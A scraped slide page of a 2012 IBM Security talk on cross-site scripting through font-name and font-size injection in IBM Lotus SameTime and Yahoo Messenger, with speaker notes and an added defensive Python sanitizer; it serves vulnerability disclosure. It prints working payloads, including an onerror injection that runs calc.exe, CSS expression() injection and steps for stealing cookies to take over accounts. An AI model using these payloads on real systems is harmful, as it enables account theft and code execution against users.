Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Stylish XSS via Font Name Injection

  • 1. © 2012 IBM Corporation, IBM Security Systems. Stylish XSS via Font Name Injection
  • 2. Background - Instant Messengers
  • 3. Background - Instant Messengers: <Text Style="font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000;">Hi!</Text>
  • 4. Background - Instant Messengers: Every time I've seen this screen, I wondered "What if I could use some HTML here…"
  • 5. Background - Windows Fonts: Windows accepts basically any character as part of the font name. Font name length is limited to ~30 chars.
  • 6. IBM Lotus SameTime Messenger: <span style="font-size:14pt;font-family:Segoe UI;font-weight:normal;font-style:normal;">You Do!</span>
  • 7. SameTime - Exploit - CSS. Font Name: expression(alert(1));
  • 8. SameTime - Exploit - CSS. Font Name: expression(alert(1)); Desired output: <span style=";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. SameTime - Exploit - New Attribute. Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:" onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. SameTime - Exploit: ~50 Fonts Later
  • 11. SameTime - Exploit - Found. Message sent: <span style="…font-family: Message received: <span style="…font-family:
  • 12. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='> Message received: <span style="…font-family:
  • 13. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='> Message received: <span style="…font-family:e0"> <img x='>
  • 14. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS"> Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  • 15. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  • 16. SameTime - Exploit - Found. Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. SameTime – Remote Code Execution: <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. Yahoo Messenger
  • 19. Yahoo Messenger – Message View: Lots of colors, but that's about it…
  • 20. Yahoo Messenger - History View
  • 21. Yahoo Messenger - History View
  • 22. Yahoo Messenger - History View: Finally, Yahoo's purple alert!
  • 23. Yahoo Messenger - The Payload: <img src="x"onmouseover="alert(1)">
  • 24. Yahoo Messenger - Digging Deeper: Wait, what? It's not local?!
  • 25. Yahoo Messenger - Digging Deeper: Accessing this URL in Chrome yields the same result.
  • 26. Yahoo Messenger - Digging Deeper: That means I can read the cookie! And steal your account!
  • 27. Yahoo Messenger - Recap: 1. Send the victim a message that contains a malicious HTML snippet. 2. Wait 3-4 hours for it to show up in the history. 3. Convince the user to access his history, or send him a direct link to it (after all, it's not local). 4. Have the victim click "Instant Message" in the drop-down box.
  • 28. Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. Yahoo Messenger - Web Messenger: During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger. The message: <font face="xxx" size="20">33333</font> Was rendered as: <font style="font-size:20pt" face="xxx" id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. Yahoo Messenger - Exploiting CSS: Add a new rule with an expression() call.
  • 31. Yahoo Messenger - Exploiting CSS: Started with: <font face=ssss size="1&color:red">xxxx</font> To my surprise, the response came back as I hoped: <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. Yahoo Messenger - Exploiting CSS: Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. Yahoo Messenger - Exploiting CSS: Time to open Internet Explorer!
  • 34. Yahoo Web Messenger - IE Version
  • 35. Yahoo Web Messenger - IE Version. The rules (for IE): 1. The size attribute must be surrounded by double quotes (" "). 2. The size value must be followed by the "pt;" suffix: <font size="15pt;"> is rendered as <font style="font-size=15pt;">
  • 36. Yahoo Web Messenger - IE Version: By tweaking the size value, a new font-family CSS rule could be injected: <font size="15pt;font-family:aaaa;"> is rendered as <font style="font-size=15pt;font-family: aaaa;">
  • 37. Yahoo Web Messenger - IE Version: With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering: <font size="15pt;font-family:expression(alert(1));">
  • 38. Yahoo Web Messenger - IE Version: It should work correctly according to the rendered source in IE Developer Tools
  • 39. Yahoo Web Messenger - IE Version: Yet somehow, no alert
  • 40. Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself, I finally found out what I was afraid of. Or in other words, the "No Expression For You" meta tag: <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. Yahoo Web Messenger - Going Old School: Fired up my Windows XP VM and kicked out IE8
  • 42. Yahoo Web Messenger - Finally
  • 43. Yahoo Messenger - History Window
  • 44. Questions?

Editor's notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients. One of them will not be disclosed today because it has not yet been patched; it will be published on our blog once it is patched.
  2.–3. Explain how IMs work. Talk about: the message window is actually a browser; the user's text message is wrapped in an HTML\XML template containing the following fields; the message is sent and then rendered as HTML\XML in the client's browser. The template accepts parameters dictating: color, font name, font weight, font style, and more. Let's talk about IMs and set aside for a moment all the video, sound and file-transfer functionality, keeping only the aspect of sending messages. If we try to map the ways we have to send input to the system, we arrive at something like the example.
  4. To configure all these settings, these apps usually come with a screen like this one. Every time I've seen this screen, I wondered "what if I could use some HTML here…"
  5. And apparently, you can! Windows fonts: all chars are valid; max 30 chars in every font name.
  6. Explain that the font we change goes into this template and is then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to the span tag 3. Get out to the HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload: getting out of the style attr and getting into a new onclick attr. Results in the onclick being empty. No good.
  10.–15. Two-field attack. First field (Font Name): 1. The filter deletes the <style<style</style part. 2. We are left with e0"><img x='….. which opens a new IMG tag with an X attribute (using a single quote). Second field (Message Text): 1. Closes the X attribute (it contains all the rest of the real CSS). 2. Adds a SRC attribute. 3. Adds an ONERROR attribute relocating the window to an EXE/BAT file. 4. The file will be executed.
  16. The second line shows the trapped CSS in the X parameter. Calc executed example.
  17. Yahoo: no History found in the local FS, meaning the template is unknown. Messages sent take about 3-4 hours till they register in the History. That means that every time I wanted to test anything, I had to wait 3-4 hours for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well; all messages sent managed to do nothing more than pretty colors. Taking into account the fact that every test takes 3 hours, I decided it's best to move on and open the history.
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom. Endless pop-ups popped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked, and we can now move on and get some info such as: User Agent, Privileges, etc…
  23. Digging deeper got us the browser type (IE) and the location of the page, which is an internet address.
  24. So I tried accessing this page using Chrome, and as long as I was logged in to Yahoo!, it got me the same results!
  25. The next thing I found was the cookie. Apparently, Yahoo doesn't like to use HTTP-only cookies, so stealing the cookie actually means stealing the account!
  26. Send message. Wait 3-4h. Social-engineer the user into opening the History. Have the user click on the Instant Messages context menu.
  27. No more 3-hour tests. I can now send a message and see it on the web messenger immediately. I now know the template.
  28. I sent the first line of code; the web messenger rendered the second line of code. Changes: added a new ID attribute – we don't care! Transformed the Size attribute into a CSS font-size attribute – very interesting!
  29. First, I tried to inject a new color:red sentence, using the & -> &amp; encoding in order to terminate the CSS rule and inject a new one. And that worked without a glitch.
  30. Tried the same with an expression call, and all seems well
  31. Opening IE. But no alert… After digging a little deeper:
  32. Different sanitizer per browser. Found an older message that has a similar behavior. Worked on that example till I found some guidelines for the transformation on IE.
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
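Both the SameTime font-name template (slide 6, notes 6 and 10–15) and the Yahoo size-to-font-size transformation (notes 28–35) fail because untrusted strings are filtered and then concatenated into a style attribute. As an added defensive example that is not SameTime's or Yahoo's code, the following whitelists each CSS value instead and escapes attribute and text contexts separately; the regexes, defaults and function names are assumptions, and the rejected inputs are the ones the slides show.

```python
import html
import re

# Assumed defaults and validators for an IM template of the shape shown on
# slide 6 (<span style="font-size:..;font-family:..;">text</span>). Neither
# SameTime's nor Yahoo's code; names, regexes and defaults are assumptions.
DEFAULT_FONT = "Segoe UI"
DEFAULT_SIZE = "14pt"
# Windows font names are ~30 chars (slide 5); allow letters, digits, space and hyphen only.
FONT_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 \-]{0,29}")
# A size is digits plus a unit, so ';', '&' and ':' can never reach the style attribute.
FONT_SIZE_RE = re.compile(r"(?:[1-9]\d?|1\d\d)(?:pt|px)")
# Syntax with no business in a font name: quotes, tag/paren/rule delimiters, expression().
INJECTION_RE = re.compile(r"""[<>"'();\\]|expression\s*\(""", re.I)


def safe_font_family(name: str) -> str:
    """Whitelist instead of filter: anything outside the allowed alphabet falls back."""
    return name if FONT_NAME_RE.fullmatch(name) else DEFAULT_FONT


def safe_font_size(size: str) -> str:
    """Only a plain number plus unit survives; "1&color:red" or "15pt;font-family:..." cannot."""
    return size if FONT_SIZE_RE.fullmatch(size) else DEFAULT_SIZE


def looks_injected(font_name: str) -> bool:
    """Detection hook: a client-submitted font name carrying markup or CSS syntax is worth logging."""
    return INJECTION_RE.search(font_name) is not None


def render_message(font_name: str, font_size: str, text: str) -> str:
    """Build the span from validated CSS values, then attribute-escape and text-escape separately."""
    style = f"font-size:{safe_font_size(font_size)};font-family:{safe_font_family(font_name)};"
    return (f'<span style="{html.escape(style, quote=True)}">'
            f"{html.escape(text, quote=True)}</span>")


if __name__ == "__main__":
    # Constructed samples: the font names and size values the slides show being rejected or abused.
    for name in ["Segoe UI", "expression(alert(1));", '"onclick="alert(1)"',
                 "e0\" <<style<style</style>img x='>"]:
        print(f"{name!r:45} injected={looks_injected(name)} -> {safe_font_family(name)!r}")
    for size in ["14pt", "1&color:red", "15pt;font-family:expression(alert(1));"]:
        print(f"{size!r:45} -> {safe_font_size(size)!r}")
    print(render_message("Arial", "9pt", '<img src="x"onmouseover="alert(1)">'))
```

The X-UA-Compatible meta tag on slide 40 only disables expression() in IE8 standards mode; the whitelist above does not depend on the rendering engine.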
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag But this meta tag doesn’t work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE